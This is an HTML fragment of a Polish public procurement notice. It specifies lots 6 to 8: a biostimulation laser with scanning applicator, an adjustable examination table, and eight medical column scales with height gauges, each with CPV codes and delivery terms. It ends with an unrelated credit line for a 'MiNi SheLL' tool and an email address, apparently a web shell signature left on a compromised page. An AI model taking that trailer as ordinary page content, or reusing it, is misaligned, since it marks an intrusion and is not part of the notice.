<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Laser biostymulacyjny ze skanerem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Laser biostymulacyjny ze skanerem - 	możliwość współpracy z aplikatorem skanującym 
i sondami punktowymi; regulacja mocy sond i aplika torów; tryby emisji: ciągły i impulsowy; regulacja mocy 
w zakresie min. 25-100%; zakres częstotliwości 1-5000Hz; regulacja wypełnienia lub czasu impulsu; możliwość podłączenia minimum 2 sond punktowych oraz aplikatora skanującego równocześnie; liczniki czasu pracy sond laserowych; stabilizacja i regulacja mocy sond; tryby pracy: programowy/manualny; wbudowane programy zabiegowe usprawniające obsługę aparatu: jedn. chor. wybierane wg nazwy( min. 30 programów dla sondy IR;  min. 20 programów dla sondy R; min. 20 programów użytkownika; min. 8 programów z czest. Nogiera; min. 30 programów z czest. Volla); możliwość tworzenia sekwencji zabiegowych (min. 10 sekwencji dla sond punktowych;  min. 25 sekwencji dla aplikatorów skanujących); edycja nazw programów użytkownika; obsługa w trybie graficznym; system informacji kontekstowej; duży, czytelny wyświetlacz; zasilanie 230V, 50Hz, maks. 40W; wymiary sterownika max. 30x23x11 cm masa max 2,5 kg; aplikator skanujący z regulacją wysokości ramienia 
w zakresie min. 60-140 cm; regulacja położenia głowicy w dwóch osiach; określanie pola zabiegowego 
w minimum 3 trybach kreślenia: elipsa, linia, krzywe w granicach prostokąta, automatyczne przeliczanie czasu pracy w zależności od wielkości pola zabiegowego; ramię podtrzymywane a pomocą siłowników pneumatycznych; półka na sterownik i okulary, aplikator  na podstawie jezdnej; okulary do laseroterapii min. 2 szt; aplikator skanujący o mocy min. R 50mW oraz IR 400mW; sonda punktowa R 660nm/40mW; sonda punktowa IR 808nm/400mW. Paszport techniczny urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Uniwersalny stół do badań lekarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalny stół do badań lekarskich - wykonany z profili stalowych pokrytych lakierem proszkowym, odpornym na uszkodzenia mechaniczne; cztery segmenty leża tapicerowane bezszwowo w kolorze wskazanym przez zamawiającego po wyborze oferty; regulacja wysokości leża hydrauliczna przy pomocy dźwigni nożnej; bezstopniowa regulacja oparcia pleców dokonywana mechanizmem dociskowym; pozycja Trendelenburga i anty-Trendelenburga wspomagana sprężyną gazową.; szyna ze stali nierdzewnej do mocowania wyposażenia dodatkowego, rolkę prześcieradła jednorazowego użytku, wysuwaną misę ze stali nierdzewnej; wymiary +/- 50 mm szerokość 650 mm; długość 1950 mm; kąt przechyłu Trendelenburga min 0 - 15°; kąt przechyłu anty-Trendelenburga min 0 - 10°;  zakres regulacji wysokości leża min 770 - 1050 mm; kąt odchylenia oparcia pleców min 0 - 75°;  kąt odchylenia siedziska min 0 - 15°. Paszport techniczny urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Waga lekarska ze wzrostomierzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Waga lekarska ze wzrostomierzem (8 sztuk) - elektroniczne wagi kolumnowe przeznaczone 
do szpitali, przychodni oraz gabinetów lekarskich, zalegalizowane do celów medycznych wg klasy III;  funkcja BMI do szybkiego określenia ogólnego stanu odżywienia pacjenta; funkcji zatrzymania wyników na wyświetlaczu; zasilanie bateryjne min 15 tysięcy cykli ważenia na jednej baterii; kółka transportowe;  obciążenie maksymalne 200 kg;dzziałka elementarna 100 g < 150 kg > 200 g;  zakres do 200 kg; wymiary +/- 15mm szer. x wys. x głęb.) szerokość 294 x wysokość 831 x głębokość 417;   platforma +/- 15 mm  szerokość 272 x 75 x 280 mm min 280 mm; wzrostomierz min 60-200 cm, działka 1 mm;  wyświetlacz LCD; wysokość odczytu ok. 800 mm; masa własna max .7  kg; zasilanie z akumulatorów ogólnie dostępnych i elektryczne poprzez zasilacz z wtyczką 230 V / 50 Hz. Paszporty techniczne urządzeń i książki legalizacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com